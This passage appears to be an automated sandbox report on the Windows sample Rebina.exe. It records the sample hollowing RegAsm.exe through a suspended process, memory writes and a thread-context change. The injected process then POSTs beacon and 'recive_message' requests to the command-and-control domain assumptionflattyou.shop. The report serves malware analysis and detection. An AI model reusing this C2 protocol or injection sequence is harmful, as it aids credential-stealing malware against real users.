Aug 28, 2024 11:17:01.289619923 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.289666891 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.289711952 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.289726019 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.294167042 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.294229984 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.294239044 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.294262886 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.294362068 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.296777964 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.296789885 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.296844006 CEST	49704	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.296849012 CEST	443	49704	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.303205013 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.303231955 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.303333044 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.303661108 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.303675890 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.767501116 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.767616034 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.778939962 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.778956890 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.779216051 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:01.799746037 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.799746037 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:01.799839973 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:02.186674118 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:02.186775923 CEST	443	49705	104.21.66.182	192.168.2.5
Aug 28, 2024 11:17:02.186974049 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:02.190560102 CEST	49705	443	192.168.2.5	104.21.66.182
Aug 28, 2024 11:17:02.190576077 CEST	443	49705	104.21.66.182	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 11:17:00.617141008 CEST	65232	53	192.168.2.5	1.1.1.1
Aug 28, 2024 11:17:00.634032965 CEST	53	65232	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 28, 2024 11:17:00.617141008 CEST	192.168.2.5	1.1.1.1	0x1327	Standard query (0)	assumptionflattyou.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 28, 2024 11:17:00.634032965 CEST	1.1.1.1	192.168.2.5	0x1327	No error (0)	assumptionflattyou.shop		104.21.66.182	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:17:00.634032965 CEST	1.1.1.1	192.168.2.5	0x1327	No error (0)	assumptionflattyou.shop		172.67.163.54	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

assumptionflattyou.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.66.182	443	5232	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 09:17:01 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: assumptionflattyou.shop
2024-08-28 09:17:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-28 09:17:01 UTC	561	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hehdRYvOK4fAMohHZEVlMxHw5F4Co6BPBA5RD1XH0vBQg4HKv68nVr3xWJl5rZIhh7EPJXQIVRin%2BvDlLwTP55xQQ%2B72pKnEcsGCqo5Mr1jJve4D1ecU%2FKr4cstG3FFSWuOnpK4EhM1cHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ba334b2bc221784-EWR
2024-08-28 09:17:01 UTC	808	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-28 09:17:01 UTC	1369	IN	Data Raw: 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 Data Ascii: gi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElement
2024-08-28 09:17:01 UTC	1369	IN	Data Raw: 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 55 49 74 57 4c 50 62 2e 6a 66 66 46 6b 51 48 59 78 43 58 61 68 79 51 55 79 56 34 38 67 4d 6d 75 37 42 71 4a 77 44 31 4f 6a 42 6f 2d 31 37 32 34 38 33 36 36 32 31 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 Data Ascii: ain"> <input type="hidden" name="atok" value="UItWLPb.jffFkQHYxCXahyQUyV48gMmu7BqJwD1OjBo-1724836621-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="
2024-08-28 09:17:01 UTC	859	IN	Data Raw: 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f Data Ascii: eparator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Clo
2024-08-28 09:17:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.66.182	443	5232	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 09:17:01 UTC	360	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=UItWLPb.jffFkQHYxCXahyQUyV48gMmu7BqJwD1OjBo-1724836621-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: assumptionflattyou.shop
2024-08-28 09:17:01 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 4b 65 6e 30 7a 7a 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@Ken0zz&j=
2024-08-28 09:17:02 UTC	816	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:17:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=to6a21b6nmdgpq9v25ftokb6ot; expires=Sun, 22-Dec-2024 03:03:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZZ%2FxXeB%2BbkKyBSvHjvBLV%2BB%2F0fxfuuGHVKNenxYIp6gqkvwnsHrDMZwFIT9XsEbzw9BT5ewRnfCQlCdY78gqmP8CWkimtm5bQwCcD07pAfsNorbMALcKq5uv5gKnYfoMujN%2F6A5vpfvmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ba334b68ecc8c47-EWR alt-svc: h3=":443"; ma=86400
2024-08-28 09:17:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-28 09:17:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:16:59
Start date:	28/08/2024
Path:	C:\Users\user\Desktop\Rebina.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Rebina.exe"
Imagebase:	0x680000
File size:	292'352 bytes
MD5 hash:	30CBC399E37EEF662EAEB7D90148F013
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:16:59
Start date:	28/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:16:59
Start date:	28/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:16:59
Start date:	28/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x110000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:16:59
Start date:	28/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x920000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:17:02
Start date:	28/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624
Imagebase:	0xde0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	60%
Total number of Nodes:	30
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02AC249D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02AC260C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02AC261F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02AC263D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02AC2661
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02AC268C
TerminateProcess.KERNELBASE(?,00000000), ref: 02AC26AB
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02AC26E4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02AC272F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02AC276D
Wow64SetThreadContext.KERNEL32(?,?), ref: 02AC27A9
ResumeThread.KERNELBASE(?), ref: 02AC27B8

Strings

aryA, xrefs: 02AC24E3
Load, xrefs: 02AC24DB
ress, xrefs: 02AC2527
GetP, xrefs: 02AC251F

Memory Dump Source

Source File: 00000000.00000002.2065490816.0000000002AC2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac2000_Rebina.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: GetP$Load$aryA$ress
API String ID: 2440066154-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: e3bd4571ce013c221369d7127129acc7a048ac08e8bc5b45cd04a19349ee79d6
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 80B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94

Function 00E10988 Relevance: 2.8, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ak3, xrefs: 00E10A25
\ {h, xrefs: 00E109D8

Memory Dump Source

Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd

Similarity

API ID: CreateProtectRemoteThreadVirtual
String ID: \ {h$ak3
API String ID: 2395912828-2677785941
Opcode ID: ce028637d3f35729ee7fe0ab2f98300491006651bd6ed504de721f5e41a73a7d
Instruction ID: e724406dd8754bb32567c768717a9738e3148a7d7a338fb9ca298fd422b2e3c2
Opcode Fuzzy Hash: ce028637d3f35729ee7fe0ab2f98300491006651bd6ed504de721f5e41a73a7d
Instruction Fuzzy Hash: E9D14DB4E002188FDB24DFA9C980B9DBBB2FB88314F1495A8E509EB255CB709DC5CF51

Function 00E10987 Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ak3, xrefs: 00E10A25
\ {h, xrefs: 00E109D8

Memory Dump Source

Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd

Similarity

API ID: CreateProtectRemoteThreadVirtual
String ID: \ {h$ak3
API String ID: 2395912828-2677785941
Opcode ID: 6507324a687eb4deb8156266c880b8a1dc65efde35e3fdd8f307d9bd8468b7b3
Instruction ID: 17433e4679a8a5ad9191d8085befdd548fd2b69d6f0b970cbedd5cf8fb4724f1
Opcode Fuzzy Hash: 6507324a687eb4deb8156266c880b8a1dc65efde35e3fdd8f307d9bd8468b7b3
Instruction Fuzzy Hash: 8DB15AB4E002188FDB24DFA9D980BDDBBB2FB88314F1495A8E109AB255CBB05DC5CF51

Function 00E1051C Relevance: 1.6, APIs: 1, Instructions: 69
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,03AC234C,?,00E10BF2,?), ref: 00E114CC

Memory Dump Source

Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: ffc32598b7fb883b04745cbdd9d1d4e69d9cc475c6091b03a8a13f64b50e1cae
Instruction ID: fa87521d2f14b8b143a884c6addfd788dd0a9e40eb9d20bd831498e243e054a8
Opcode Fuzzy Hash: ffc32598b7fb883b04745cbdd9d1d4e69d9cc475c6091b03a8a13f64b50e1cae
Instruction Fuzzy Hash: 183110B1D00249DFCB10CF9AD884ADEBBF4FB48310F20842AE919A7310D375A954CFA5

Function 00E1142F Relevance: 1.6, APIs: 1, Instructions: 66
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,03AC234C,?,00E10BF2,?), ref: 00E114CC

Memory Dump Source

Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: 7a056e48013c6e8f7390d9a34005be4de38306c497a881bbc4354f16df425e98
Instruction ID: 3d40a7bdc9ca5ba72b4f657272c7ab27d9ddde57f21c1831e7884afb4f73e86a
Opcode Fuzzy Hash: 7a056e48013c6e8f7390d9a34005be4de38306c497a881bbc4354f16df425e98
Instruction Fuzzy Hash: EE21FEB5D012499FCB10CFAAD984ADEBFF4FB48310F20842AE919A7350C375A954CFA1

Function 00E104F8 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,03AC3590,?,?,?,?,?,?,?,?,?,?,00E10B41,?,00000040,?), ref: 00E110F4

Memory Dump Source

Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8304e7ed3a635e7001c9e6aee941f0301c4c238448135aa1ca332bc285a17ad5
Instruction ID: 6d1353a6cc7a0425757a7f57ce8d147eb223a672d19f5051b349edfcce323110
Opcode Fuzzy Hash: 8304e7ed3a635e7001c9e6aee941f0301c4c238448135aa1ca332bc285a17ad5
Instruction Fuzzy Hash: 1E21E3B1D05259EFCB10DF9AD884ADEFFB4FB48310F50816AEA18A7200C375A954CFA1

Function 00E11077 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,03AC3590,?,?,?,?,?,?,?,?,?,?,00E10B41,?,00000040,?), ref: 00E110F4

Memory Dump Source

Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9624ef8c797849d53fdd7a1a85c8e779f032b3095da513731e98a57947069b9b
Instruction ID: c7165d82fe636c805970b284572bca58ab6d541bca4355c6786bb0c377731d40
Opcode Fuzzy Hash: 9624ef8c797849d53fdd7a1a85c8e779f032b3095da513731e98a57947069b9b
Instruction Fuzzy Hash: C521F2B5D01259AFCB00CF9AD884ADEFFB4FF48310F10811AE918A7210C3756954CFA1

Non-executed Functions

Function 00E10C1B Relevance: .1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d871754b17502a4e41c6a353923dafe0dad13a4a21d09657797f91d3f39a9094
Instruction ID: 720e2e03e9e8fe306f877c69a444c07663f73a8dedca5a32564804050a9c2f6a
Opcode Fuzzy Hash: d871754b17502a4e41c6a353923dafe0dad13a4a21d09657797f91d3f39a9094
Instruction Fuzzy Hash: F451F074F016198FDB28CBA8D9C0ADDB3F2BB88314F549569E509FB215CAB06DC48F51

Analysis Process: RegAsm.exePID: 5232, Parent PID: 6984COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40.4%
Total number of Nodes:	94
Total number of Limit Nodes:	10

Executed Functions

Function 0040A800 Relevance: 21.6, APIs: 1, Strings: 11, Instructions: 564
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(970F9913,00000000,00000800), ref: 0040A8A2

Strings

;G#Y, xrefs: 0040AAE3
#_)Q, xrefs: 0040AAF3
'C!E, xrefs: 0040AADB
assumptionflattyou.shop, xrefs: 0040ACD9, 0040AF24
)[%], xrefs: 0040AAEB
9O:A, xrefs: 0040AAD3
yK{M, xrefs: 0040AACB
D?J1, xrefs: 0040ABB6
D3B5, xrefs: 0040AABB
A7|I, xrefs: 0040AAC3
.S)U, xrefs: 0040AAFB

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: #_)Q$'C!E$)[%]$.S)U$9O:A$;G#Y$A7|I$D3B5$D?J1$assumptionflattyou.shop$yK{M
API String ID: 1029625771-479617566
Opcode ID: e1b5bb5a607ee36aba8147ec7f7ad96ba35c91b1c9991fd949a6b3372eb0a575
Instruction ID: 034911946247041e9fb8c60a696f5891c7d2b487d79b58c40c0c5eac602a6bf2
Opcode Fuzzy Hash: e1b5bb5a607ee36aba8147ec7f7ad96ba35c91b1c9991fd949a6b3372eb0a575
Instruction Fuzzy Hash: 1902F1B450C3408FD3109F15D8907AABBE1EF92349F18892EE4C95B3A1D3399959CF9B

Function 0040BD10 Relevance: 10.7, Strings: 8, Instructions: 654
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PV, xrefs: 0040BD2F
}#{, xrefs: 0040C84F
9i7g, xrefs: 0040C881
k%h#, xrefs: 0040C7F4
-e0c, xrefs: 0040C88B
f, xrefs: 0040C0D6
c)t', xrefs: 0040C7ED
a-e+, xrefs: 0040C7E6

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -e0c$9i7g$PV$a-e+$c)t'$k%h#$}#{$f
API String ID: 0-3076811574
Opcode ID: 43986b35fc01c073c23a74b231db141d03d21052ebb2637f36efb9902614357b
Instruction ID: 577c2644e709fb3fbdcc4a6f76d5c3f94ebe82d2132819d6a2a7b6e8fd985dee
Opcode Fuzzy Hash: 43986b35fc01c073c23a74b231db141d03d21052ebb2637f36efb9902614357b
Instruction Fuzzy Hash: 426265B4509381CFE320DF15E884B6ABBB1FF85300F158AACE5896B362D7359845CF96

Function 00435076 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(41D447A9,00000000,00000800), ref: 00435101

Strings

sr}, xrefs: 004350A3

Memory Dump Source

Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: sr}
API String ID: 1029625771-1314242954
Opcode ID: ebd350a806b6267d54850dcc7634231ec96fc33bb10cae1b160b277ce83be72e
Instruction ID: 0a7d2faaf7a5ff4dce4cd146d2c275749102720c1c2d5abf0c4620ad6cd393b1
